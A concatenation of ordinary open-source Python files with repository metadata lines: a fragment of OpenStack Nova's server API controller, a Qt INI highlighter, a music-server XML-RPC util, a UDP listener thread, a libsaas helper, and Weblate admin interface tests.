requested_networks = server_dict.get('networks')
if requested_networks is not None:
if not isinstance(requested_networks, list):
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
requested_networks = self._get_requested_networks(
requested_networks)
(access_ip_v4, ) = server_dict.get('accessIPv4'),
if access_ip_v4 is not None:
self._validate_access_ipv4(access_ip_v4)
(access_ip_v6, ) = server_dict.get('accessIPv6'),
if access_ip_v6 is not None:
self._validate_access_ipv6(access_ip_v6)
try:
flavor_id = self._flavor_id_from_req_data(body)
except ValueError as error:
msg = _("Invalid flavorRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
# optional openstack extensions:
key_name = None
if self.ext_mgr.is_loaded('os-keypairs'):
key_name = server_dict.get('key_name')
user_data = None
if self.ext_mgr.is_loaded('os-user-data'):
user_data = server_dict.get('user_data')
self._validate_user_data(user_data)
availability_zone = None
if self.ext_mgr.is_loaded('os-availability-zone'):
availability_zone = server_dict.get('availability_zone')
block_device_mapping = None
block_device_mapping_v2 = None
legacy_bdm = True
if self.ext_mgr.is_loaded('os-volumes'):
block_device_mapping = server_dict.get('block_device_mapping', [])
for bdm in block_device_mapping:
try:
block_device.validate_device_name(bdm.get("device_name"))
block_device.validate_and_default_volume_size(bdm)
except exception.InvalidBDMFormat as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
if 'delete_on_termination' in bdm:
bdm['delete_on_termination'] = strutils.bool_from_string(
bdm['delete_on_termination'])
if self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot'):
# Consider the new data format for block device mapping
block_device_mapping_v2 = server_dict.get(
'block_device_mapping_v2', [])
# NOTE (ndipanov): Disable usage of both legacy and new
# block device format in the same request
if block_device_mapping and block_device_mapping_v2:
expl = _('Using different block_device_mapping syntaxes '
'is not allowed in the same request.')
raise exc.HTTPBadRequest(explanation=expl)
# Assume legacy format
legacy_bdm = not bool(block_device_mapping_v2)
try:
block_device_mapping_v2 = [
block_device.BlockDeviceDict.from_api(bdm_dict)
for bdm_dict in block_device_mapping_v2]
except exception.InvalidBDMFormat as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
block_device_mapping = (block_device_mapping or
block_device_mapping_v2)
ret_resv_id = False
# min_count and max_count are optional. If they exist, they may come
# in as strings. Verify that they are valid integers and > 0.
# Also, we want to default 'min_count' to 1, and default
# 'max_count' to be 'min_count'.
min_count = 1
max_count = 1
if self.ext_mgr.is_loaded('os-multiple-create'):
ret_resv_id = server_dict.get('return_reservation_id', False)
min_count = server_dict.get('min_count', 1)
max_count = server_dict.get('max_count', min_count)
try:
min_count = utils.validate_integer(
min_count, "min_count", min_value=1)
max_count = utils.validate_integer(
max_count, "max_count", min_value=1)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
if min_count > max_count:
msg = _('min_count must be <= max_count')
raise exc.HTTPBadRequest(explanation=msg)
auto_disk_config = False
if self.ext_mgr.is_loaded('OS-DCF'):
auto_disk_config = server_dict.get('auto_disk_config')
scheduler_hints = {}
if self.ext_mgr.is_loaded('OS-SCH-HNT'):
scheduler_hints = server_dict.get('scheduler_hints', {})
try:
_get_inst_type = flavors.get_flavor_by_flavor_id
inst_type = _get_inst_type(flavor_id, ctxt=context,
read_deleted="no")
(instances, resv_id) = self.compute_api.create(context,
inst_type,
image_uuid,
display_name=name,
display_description=name,
key_name=key_name,
metadata=server_dict.get('metadata', {}),
access_ip_v4=access_ip_v4,
access_ip_v6=access_ip_v6,
injected_files=injected_files,
admin_password=password,
min_count=min_count,
max_count=max_count,
requested_networks=requested_networks,
security_group=sg_names,
user_data=user_data,
availability_zone=availability_zone,
config_drive=config_drive,
block_device_mapping=block_device_mapping,
auto_disk_config=auto_disk_config,
scheduler_hints=scheduler_hints,
legacy_bdm=legacy_bdm)
except (exception.QuotaError,
exception.PortLimitExceeded) as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound as error:
msg = _("Can not find requested image")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound as error:
msg = _("Invalid flavorRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.KeypairNotFound as error:
msg = _("Invalid key_name provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.ConfigDriveInvalidValue:
msg = _("Invalid config_drive provided.")
raise exc.HTTPBadRequest(explanation=msg)
except messaging.RemoteError as err:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': err.exc_type,
'err_msg': err.value}
raise exc.HTTPBadRequest(explanation=msg)
except UnicodeDecodeError as error:
msg = "UnicodeError: %s" % unicode(error)
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata,
exception.InvalidRequest,
exception.MultiplePortsNotApplicable,
exception.NetworkNotFound,
exception.PortNotFound,
exception.SecurityGroupNotFound,
exception.InvalidBDM,
exception.PortRequiresFixedIP,
exception.NetworkRequiresSubnet,
exception.InstanceUserDataMalformed) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
except (exception.PortInUse,
exception.NoUniqueMatch) as error:
raise exc.HTTPConflict(explanation=error.format_message())
# If the caller wanted a reservation_id, return it
if ret_resv_id:
return wsgi.ResponseObject({'reservation_id': resv_id},
xml=ServerMultipleCreateTemplate)
req.cache_db_instances(instances)
server = self._view_builder.create(req, instances[0])
if CONF.enable_instance_password:
server['server']['adminPass'] = password
robj = wsgi.ResponseObject(server)
return self._add_location(robj)
def _delete(self, context, req, instance_uuid):
instance = self._get_server(context, req, instance_uuid)
if CONF.reclaim_instance_interval:
try:
self.compute_api.soft_delete(context, instance)
except exception.InstanceInvalidState:
# Note(yufang521247): instance which has never been active
# is not allowed to be soft_deleted. Thus we have to call
# delete() to clean up the instance.
self.compute_api.delete(context, instance)
else:
self.compute_api.delete(context, instance)
@wsgi.serializers(xml=ServerTemplate)
def update(self, req, id, body):
"""Update server then pass on to version-specific controller."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPUnprocessableEntity()
ctxt = req.environ['nova.context']
update_dict = {}
is_rename = False
if 'name' in body['server']:
name = body['server']['name']
self._validate_server_name(name)
update_dict['display_name'] = name.strip()
is_rename = True
if 'accessIPv4' in body['server']:
access_ipv4 = body['server']['accessIPv4']
if access_ipv4:
self._validate_access_ipv4(access_ipv4)
update_dict['access_ip_v4'] = (
access_ipv4 and access_ipv4.strip() or None)
if 'accessIPv6' in body['server']:
access_ipv6 = body['server']['accessIPv6']
if access_ipv6:
self._validate_access_ipv6(access_ipv6)
update_dict['access_ip_v6'] = (
access_ipv6 and access_ipv6.strip() or None)
if 'auto_disk_config' in body['server']:
auto_disk_config = strutils.bool_from_string(
body['server']['auto_disk_config'])
update_dict['auto_disk_config'] = auto_disk_config
if 'hostId' in body['server']:
msg = _("HostId cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
if 'personality' in body['server']:
msg = _("Personality cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
try:
instance = self.compute_api.get(ctxt, id,
want_objects=True)
req.cache_db_instance(instance)
policy.enforce(ctxt, 'compute:update', instance)
instance.update(update_dict)
instance.save()
if is_rename is True:
self.compute_api.rename_virtualmachine(ctxt, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
return self._view_builder.show(req, instance)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('confirmResize')
def _action_confirm_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.confirm_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'confirmResize')
return exc.HTTPNoContent()
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('revertResize')
def _action_revert_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.revert_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
msg = _("Flavor used by the instance could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'revertResize')
return webob.Response(status_int=202)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('reboot')
def _action_reboot(self, req, id, body):
if 'reboot' in body and 'type' in body['reboot']:
if not isinstance(body['reboot']['type'], six.string_types):
msg = _("Argument 'type' for reboot must be a string")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
valid_reboot_types = ['HARD', 'SOFT']
reboot_type = body['reboot']['type'].upper()
if not valid_reboot_types.count(reboot_type):
msg = _("Argument 'type' for reboot is not HARD or SOFT")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
msg = _("Missing argument 'type' for reboot")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.reboot(context, instance, reboot_type)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'reboot')
return webob.Response(status_int=202)
def _resize(self, req, instance_id, flavor_id, **kwargs):
"""Begin the resize process with given instance/flavor."""
context = req.environ["nova.context"]
instance = self._get_server(context, req, instance_id)
try:
self.compute_api.resize(context, instance, flavor_id, **kwargs)
except exception.QuotaError as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.FlavorNotFound:
msg = _("Unable to locate requested flavor.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.CannotResizeToSameFlavor:
msg = _("Resize requires a flavor change.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resize')
except exception.ImageNotAuthorized:
msg = _("You are not authorized to access the image "
"the instance was started with.")
raise exc.HTTPUnauthorized(explanation=msg)
except exception.ImageNotFound:
msg = _("Image that the instance was started "
"with could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.Invalid:
msg = _("Invalid instance image.")
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.response(204)
def delete(self, req, id):
"""Destroys a server."""
try:
self._delete(req.environ['nova.context'], req, id)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'delete')
def _image_ref_from_req_data(self, data):
try:
return unicode(data['server']['imageRef'])
except (TypeError, KeyError):
msg = _("Missing imageRef attribute")
raise exc.HTTPBadRequest(explanation=msg)
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id and use the default glance connection params
image_uuid = image_href.split('/').pop()
if not uuidutils.is_uuid_like(image_uuid):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
def _image_from_req_data(self, data):
"""Get image data from the request or raise appropriate
exceptions
If no image is supplied - checks to see if there is
block devices set and proper extesions loaded.
"""
image_ref = data['server'].get('imageRef')
bdm = data['server'].get('block_device_mapping')
bdm_v2 = data['server'].get('block_device_mapping_v2')
if (not image_ref and (
(bdm and self.ext_mgr.is_loaded('os-volumes')) or
(bdm_v2 and
self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot')))):
return ''
else:
image_href = self._image_ref_from_req_data(data)
image_uuid = self._image_uuid_from_href(image_href)
return image_uuid
def _flavor_id_from_req_data(self, data):
try:
flavor_ref = data['server']['flavorRef']
except (TypeError, KeyError):
msg = _("Missing flavorRef attribute")
raise exc.HTTPBadRequest(explanation=msg)
return common.get_id_from_href(flavor_ref)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('changePassword')
def _action_change_password(self, req, id, body):
context = req.environ['nova.context']
if (not 'changePassword' in body
or 'adminPass' not in body['changePassword']):
msg = _("No adminPass was specified")
raise exc.HTTPBadRequest(explanation=msg)
password = self._get_server_admin_password(body['changePassword'])
server = self._get_server(context, req, id)
try:
self.compute_api.set_admin_password(context, server, password)
except NotImplementedError:
msg = _("Unable to set password on instance")
raise exc.HTTPNotImplemented(explanation=msg)
return webob.Response(status_int=202)
def _validate_metadata(self, metadata):
"""Ensure that we can work with the metadata given."""
try:
metadata.iteritems()
except AttributeError:
msg = _("Unable to parse metadata key/value pairs.")
LOG.debug(msg)
raise exc.HTTPBadRequest(explanation=msg)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('resize')
def _action_resize(self, req, id, body):
"""Resizes a given instance to the flavor size requested."""
try:
flavor_ref = str(body["resize"]["flavorRef"])
if not flavor_ref:
msg = _("Resize request has invalid 'flavorRef' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
except (KeyError, TypeError):
msg = _("Resize requests require 'flavorRef' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
kwargs = {}
if 'auto_disk_config' in body['resize']:
kwargs['auto_disk_config'] = body['resize']['auto_disk_config']
return self._resize(req, id, flavor_ref, **kwargs)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('rebuild')
def _action_rebuild(self, req, id, body):
"""Rebuild an instance with the given attributes."""
body = body['rebuild']
try:
image_href = body["imageRef"]
except (KeyError, TypeError):
msg = _("Could not parse imageRef from request.")
raise exc.HTTPBadRequest(explanation=msg)
image_href = self._image_uuid_from_href(image_href)
password = self._get_server_admin_password(body)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
attr_map = {
'personality': 'files_to_inject',
'name': 'display_name',
'accessIPv4': 'access_ip_v4',
'accessIPv6': 'access_ip_v6',
'metadata': 'metadata',
'auto_disk_config': 'auto_disk_config',
}
kwargs = {}
# take the preserve_ephemeral value into account only when the
# corresponding extension is active
if (self.ext_mgr.is_loaded('os-preserve-ephemeral-rebuild')
and 'preserve_ephemeral' in body):
kwargs['preserve_ephemeral'] = strutils.bool_from_string(
body['preserve_ephemeral'], strict=True)
if 'accessIPv4' in body:
self._validate_access_ipv4(body['accessIPv4'])
if 'accessIPv6' in body:
self._validate_access_ipv6(body['accessIPv6'])
if 'name' in body:
self._validate_server_name(body['name'])
for request_attribute, instance_attribute in attr_map.items():
try:
kwargs[instance_attribute] = body[request_attribute]
except (KeyError, TypeError):
pass
self._validate_metadata(kwargs.get('metadata', {}))
if 'files_to_inject' in kwargs:
personality = kwargs.pop('files_to_inject')
files_to_inject = self._get_injected_files(personality)
else:
files_to_inject = None
try:
self.compute_api.rebuild(context,
instance,
image_href,
password,
files_to_inject=files_to_inject,
**kwargs)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'rebuild')
except exception.InstanceNotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound:
msg = _("Cannot find image for rebuild")
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
instance = self._get_server(context, req, id)
view = self._view_builder.show(req, instance)
# Add on the adminPass attribute since the view doesn't do it
# unless instance passwords are disabled
if CONF.enable_instance_password:
view['server']['adminPass'] = password
robj = wsgi.ResponseObject(view)
return self._add_location(robj)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=ActionDeserializer)
@wsgi.action('createImage')
@common.check_snapshots_enabled
def _action_create_image(self, req, id, body):
"""Snapshot a server instance."""
context = req.environ['nova.context']
entity = body.get("createImage", {})
image_name = entity.get("name")
if not image_name:
msg = _("createImage entity requires name attribute")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = self._get_server(context, req, id)
bdms = block_device_obj.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
try:
if self.compute_api.is_volume_backed_instance(context, instance,
bdms):
img = instance['image_ref']
if not img:
props = bdms.root_metadata(
context, self.compute_api.image_service,
self.compute_api.volume_api)
image_meta = {'properties': props}
else:
src_image = self.compute_api.image_service.\
show(context, img)
image_meta = dict(src_image)
image = self.compute_api.snapshot_volume_backed(
context,
instance,
image_meta,
image_name,
extra_properties=props)
else:
image = self.compute_api.snapshot(context,
instance,
image_name,
extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createImage')
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# build location of newly-created image entity
image_id = str(image['id'])
image_ref = os.path.join(req.application_url,
context.project_id,
'images',
image_id)
resp = webob.Response(status_int=202)
resp.headers['Location'] = image_ref
return resp
def _get_server_admin_password(self, server):
"""Determine the admin password for a server on creation."""
try:
password = server['adminPass']
self._validate_admin_password(password)
except KeyError:
password = utils.generate_password()
except ValueError:
raise exc.HTTPBadRequest(explanation=_("Invalid adminPass"))
return password
def _validate_admin_password(self, password):
if not isinstance(password, six.string_types):
raise ValueError()
def _get_server_search_options(self):
"""Return server search options allowed by non-admin."""
return ('reservation_id', 'name', 'status', 'image', 'flavor',
'ip', 'changes-since', 'all_tenants')
def create_resource(ext_mgr):
return wsgi.Resource(Controller(ext_mgr))
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
LOG.debug(_("Removing options '%s' from query"),
", ".join(unknown_options))
for opt in unknown_options:
search_options.pop(opt, None)
| shhui/nova | nova/api/openstack/compute/servers.py | Python | apache-2.0 | 61,915 |
# -*- coding: utf-8 -*-
from __future__ import (unicode_literals, division,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2015, Jim Miller'
__docformat__ = 'restructuredtext en'
import re
try:
from PyQt5.Qt import (Qt, QSyntaxHighlighter, QTextCharFormat, QBrush)
except ImportError as e:
from PyQt4.Qt import (Qt, QSyntaxHighlighter, QTextCharFormat, QBrush)
class BasicIniHighlighter(QSyntaxHighlighter):
'''
QSyntaxHighlighter class for use with QTextEdit for highlighting
ini config files.
I looked high and low to find a high lighter for basic ini config
format, so I'm leaving this in the project even though I'm not
using.
'''
def __init__( self, parent, theme ):
QSyntaxHighlighter.__init__( self, parent )
self.parent = parent
self.highlightingRules = []
# keyword
self.highlightingRules.append( HighlightingRule( r"^[^:=\s][^:=]*[:=]",
Qt.blue,
Qt.SolidPattern ) )
# section
self.highlightingRules.append( HighlightingRule( r"^\[[^\]]+\]",
Qt.darkBlue,
Qt.SolidPattern ) )
# comment
self.highlightingRules.append( HighlightingRule( r"#[^\n]*" ,
Qt.darkYellow,
Qt.SolidPattern ) )
def highlightBlock( self, text ):
for rule in self.highlightingRules:
for match in rule.pattern.finditer(text):
self.setFormat( match.start(), match.end()-match.start(), rule.highlight )
self.setCurrentBlockState( 0 )
class HighlightingRule():
def __init__( self, pattern, color, style ):
if isinstance(pattern,basestring):
self.pattern = re.compile(pattern)
else:
self.pattern=pattern
charfmt = QTextCharFormat()
brush = QBrush(color, style)
charfmt.setForeground(brush)
self.highlight = charfmt
| PlushBeaver/FanFicFare | calibre-plugin/basicinihighlighter.py | Python | gpl-3.0 | 2,295 |
#Boss Ogg - A Music Server
#(c)2003 by Ted Kulp ([email protected])
#This project's homepage is: http://bossogg.wishy.org
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from boss3.util import Logger
from boss3.util.Session import *
import boss3.xmlrpc.bossxmlrpclib as xmlrpclib
class Util:
"""
Util realm. This will contain basic functions that don't
really fit anywhere else. They can generally have a very low
security level.
util("version"): Returns version information about the running
server.
Parameters:
* None
Returns:
* Struct
* version - string
* name - string
"""
def handleRequest(self, cmd, argstuple):
session = Session()
args = []
for i in argstuple:
args.append(i)
if (session.hasKey('cmdint')):
cmdint = session['cmdint']
if cmd == "version":
return cmdint.util.version()
# vim:ts=8 sw=8 noet
| tedkulp/bossogg | boss3/xmlrpc/Util.py | Python | gpl-2.0 | 1,506 |
#UDP Class
#UDP Server stuff
import threading
from threading import Thread
import socket
import time
UDPBufferSize = 1024 #UDP Data buffer size in bytes
class UDP(threading.Thread):
"""docstring for UDP"""
def __init__(self, UDPIp, UDPPort, Callback):
threading.Thread.__init__(self)
self.CallbackFunction = Callback
self.UDPIp = UDPIp
self.UDPPort = UDPPort
def init(self):
global Socket
Socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Socket.bind((self.UDPIp, self.UDPPort))
def run(self): #When thread is started this should be executed
while True:
UDPData, UDPRecvAddress = Socket.recvfrom(UDPBufferSize)
self.CallbackFunction(UDPData)
| snowdenator/EarlHomeAutomation | GenV/Software/Server/Refactored Code/udp.py | Python | mit | 683 |
from . import current
def use_executor(executor):
current.process = executor
def current_executor():
return current.process
| ducksboard/libsaas | libsaas/executors/base.py | Python | mit | 136 |
#
# Copyright © 2012 - 2021 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import json
import os
import responses
import social_django.utils
from django.conf import settings
from django.core import mail
from django.core.checks import Critical
from django.core.serializers.json import DjangoJSONEncoder
from django.test.utils import override_settings
from django.urls import reverse
from django.utils import timezone
from weblate.auth.models import Group
from weblate.trans.models import Announcement
from weblate.trans.tests.test_views import ViewTestCase
from weblate.trans.tests.utils import get_test_file
from weblate.utils.checks import check_data_writable
from weblate.utils.unittest import tempdir_setting
from weblate.wladmin.middleware import ManageMiddleware
from weblate.wladmin.models import BackupService, ConfigurationError, SupportStatus
TEST_BACKENDS = ("weblate.accounts.auth.WeblateUserBackend",)
class AdminTest(ViewTestCase):
"""Test for customized admin interface."""
def setUp(self):
super().setUp()
self.user.is_superuser = True
self.user.save()
def test_index(self):
response = self.client.get(reverse("admin:index"))
self.assertContains(response, "SSH")
def test_manage_index(self):
response = self.client.get(reverse("manage"))
self.assertContains(response, "SSH")
def test_ssh(self):
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "SSH keys")
@tempdir_setting("DATA_DIR")
def test_ssh_generate(self):
self.assertEqual(check_data_writable(), [])
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "Generate SSH key")
response = self.client.post(reverse("manage-ssh"), {"action": "generate"})
self.assertContains(response, "Created new SSH key")
response = self.client.get(reverse("manage-ssh-key"))
self.assertContains(response, "PRIVATE KEY")
@tempdir_setting("DATA_DIR")
def test_ssh_add(self):
self.assertEqual(check_data_writable(), [])
try:
oldpath = os.environ["PATH"]
os.environ["PATH"] = ":".join((get_test_file(""), os.environ["PATH"]))
# Verify there is button for adding
response = self.client.get(reverse("manage-ssh"))
self.assertContains(response, "Add host key")
# Add the key
response = self.client.post(
reverse("manage-ssh"), {"action": "add-host", "host": "github.com"}
)
self.assertContains(response, "Added host key for github.com")
finally:
os.environ["PATH"] = oldpath
# Check the file contains it
hostsfile = os.path.join(settings.DATA_DIR, "ssh", "known_hosts")
with open(hostsfile) as handle:
self.assertIn("github.com", handle.read())
@tempdir_setting("BACKUP_DIR")
def test_backup(self):
def do_post(**payload):
return self.client.post(reverse("manage-backups"), payload, follow=True)
response = do_post(repository=settings.BACKUP_DIR)
self.assertContains(response, settings.BACKUP_DIR)
service = BackupService.objects.get()
response = do_post(service=service.pk, trigger="1")
self.assertContains(response, "triggered")
response = do_post(service=service.pk, toggle="1")
self.assertContains(response, "Turned off")
response = do_post(service=service.pk, remove="1")
self.assertNotContains(response, settings.BACKUP_DIR)
def test_performace(self):
response = self.client.get(reverse("manage-performance"))
self.assertContains(response, "weblate.E005")
def test_error(self):
ConfigurationError.objects.create(name="Test error", message="FOOOOOOOOOOOOOO")
response = self.client.get(reverse("manage-performance"))
self.assertContains(response, "FOOOOOOOOOOOOOO")
ConfigurationError.objects.filter(name="Test error").delete()
response = self.client.get(reverse("manage-performance"))
self.assertNotContains(response, "FOOOOOOOOOOOOOO")
def test_report(self):
response = self.client.get(reverse("manage-repos"))
self.assertContains(response, "On branch main")
def test_create_project(self):
response = self.client.get(reverse("admin:trans_project_add"))
self.assertContains(response, "Required fields are marked in bold")
def test_create_component(self):
response = self.client.get(reverse("admin:trans_component_add"))
self.assertContains(response, "Import speed documentation")
def test_component(self):
"""Test for custom component actions."""
self.assert_custom_admin(reverse("admin:trans_component_changelist"))
def test_project(self):
"""Test for custom project actions."""
self.assert_custom_admin(reverse("admin:trans_project_changelist"))
def assert_custom_admin(self, url):
"""Test for (sub)project custom admin."""
response = self.client.get(url)
self.assertContains(response, "Update VCS repository")
for action in "force_commit", "update_checks", "update_from_git":
response = self.client.post(
url, {"_selected_action": "1", "action": action}
)
self.assertRedirects(response, url)
def test_configuration_health_check(self):
# Run checks internally
ManageMiddleware.configuration_health_check()
# List of triggered checks remotely
ManageMiddleware.configuration_health_check(
[
Critical(msg="Error", id="weblate.E001"),
Critical(msg="Test Error", id="weblate.E002"),
]
)
all_errors = ConfigurationError.objects.all()
self.assertEqual(len(all_errors), 1)
self.assertEqual(all_errors[0].name, "weblate.E002")
self.assertEqual(all_errors[0].message, "Test Error")
# No triggered checks
ManageMiddleware.configuration_health_check([])
self.assertEqual(ConfigurationError.objects.count(), 0)
def test_post_announcenement(self):
response = self.client.get(reverse("manage-tools"))
self.assertContains(response, "announcement")
self.assertFalse(Announcement.objects.exists())
response = self.client.post(
reverse("manage-tools"),
{"message": "Test message", "category": "info"},
follow=True,
)
self.assertTrue(Announcement.objects.exists())
def test_send_test_email(self, expected="Test e-mail sent"):
response = self.client.get(reverse("manage-tools"))
self.assertContains(response, "e-mail")
response = self.client.post(
reverse("manage-tools"), {"email": "[email protected]"}, follow=True
)
self.assertContains(response, expected)
if expected == "Test e-mail sent":
self.assertEqual(len(mail.outbox), 1)
def test_invite_user(self):
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
"send_email": 1,
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 1)
def test_invite_user_nosend(self):
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 0)
@override_settings(AUTHENTICATION_BACKENDS=TEST_BACKENDS)
def test_invite_user_nomail(self):
try:
# psa creates copy of settings...
orig_backends = social_django.utils.BACKENDS
social_django.utils.BACKENDS = TEST_BACKENDS
response = self.client.get(reverse("manage-users"))
self.assertContains(response, "E-mail")
response = self.client.post(
reverse("manage-users"),
{
"email": "[email protected]",
"username": "username",
"full_name": "name",
"send_email": 1,
},
follow=True,
)
self.assertContains(response, "Created user account")
self.assertEqual(len(mail.outbox), 1)
finally:
social_django.utils.BACKENDS = orig_backends
def test_check_user(self):
response = self.client.get(
reverse("manage-users-check"), {"email": self.user.email}, follow=True
)
self.assertRedirects(response, self.user.get_absolute_url())
self.assertContains(response, "Never signed-in")
response = self.client.get(
reverse("manage-users-check"), {"email": "nonexisting"}, follow=True
)
self.assertRedirects(response, reverse("manage-users") + "?q=nonexisting")
@override_settings(
EMAIL_HOST="nonexisting.weblate.org",
EMAIL_BACKEND="django.core.mail.backends.smtp.EmailBackend",
)
def test_send_test_email_error(self):
self.test_send_test_email("Could not send test e-mail")
